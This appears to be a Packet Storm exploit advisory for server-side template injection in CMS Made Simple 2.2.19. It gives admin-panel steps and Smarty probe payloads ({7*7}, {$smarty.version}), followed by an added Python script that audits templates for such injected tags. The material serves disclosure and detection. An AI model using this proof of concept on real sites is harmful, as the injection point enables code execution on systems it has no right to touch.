CMS Made Simple 2.2.19 Server-Side Template Injection
2024-2-22 23:9:39 Author: packetstormsecurity.com

# Exploit Title: CMS Made Simple Version: 2.2.19 - SSTI
# Date: 2024-21-02
# Exploit Author: tmrswrr
# Vendor Homepage: https://www.cmsmadesimple.org/
# Version: 2.2.19
# Tested on: https://www.softaculous.com/demos/CMS_Made_Simple

1 ) Log in as admin and go to Layout > Design Manager > Breadcrumbs
2 ) Click Edit and enter the SSTI payload: {7*7} , {$smarty.version},{{7*7}}
3 ) Then click Apply > Submit
4 ) Go to the home page > https://127.0.0.1/CMS_Made_Simple/index.php?page=templates-and-stylesheets
You will see: 49 class="breadcrumbs"
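
For reviewing stored template text after an edit like the one in the steps above, here is an added example (not part of the original advisory or of the CMS Made Simple code base) that extracts Smarty tags from a template and flags literal expressions, reserved `$smarty` variables and tags outside an expected baseline. The allowlist, the template samples and the function name are assumptions made for illustration.

```python
import re

# One Smarty tag with default { } delimiters. Smarty treats "{" followed by
# whitespace as literal text, so the pattern skips those as well.
TAG_RE = re.compile(r"\{(?!\s)([^{}]+)\}")
ARITH_RE = re.compile(r"[\d\s.+\-*/%()]+")      # digits and operators only
NAME_RE = re.compile(r"/?([A-Za-z_]\w*)")       # tag name, with optional "/"

def audit_template(text, allowed_tags):
    """Return (tag_body, reason) for each tag that warrants review."""
    findings = []
    for match in TAG_RE.finditer(text):
        body = match.group(1).strip()
        if body.startswith("*") and body.endswith("*"):
            continue                              # {* Smarty comment *}
        if "$smarty." in body:
            findings.append((body, "reserved $smarty variable"))
        elif any(ch.isdigit() for ch in body) and ARITH_RE.fullmatch(body):
            findings.append((body, "literal expression"))
        elif body.startswith("$"):
            continue                              # plain variable output
        else:
            name = NAME_RE.match(body)
            if name is None or name.group(1) not in allowed_tags:
                findings.append((body, "tag outside baseline"))
    return findings

# Assumed baseline for this template; not taken from CMS Made Simple.
ALLOWED_TAGS = {"foreach", "if", "else"}

# Constructed samples: a baseline template and the same template after the edit.
BASELINE = '<div class="breadcrumbs">{foreach $crumbs as $c}{$c.title}{/foreach}</div>'
EDITED = "{7*7} , {$smarty.version},{{7*7}}" + BASELINE

if __name__ == "__main__":
    for body, reason in audit_template(EDITED, ALLOWED_TAGS):
        print(f"review: {{{body}}} -> {reason}")
```

Plain variable output such as `{$c.title}` is deliberately not flagged, so the check is a review aid for template changes and not a complete policy.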


Source: https://packetstormsecurity.com/files/177244/cmsmadesimple2219-ssti.txt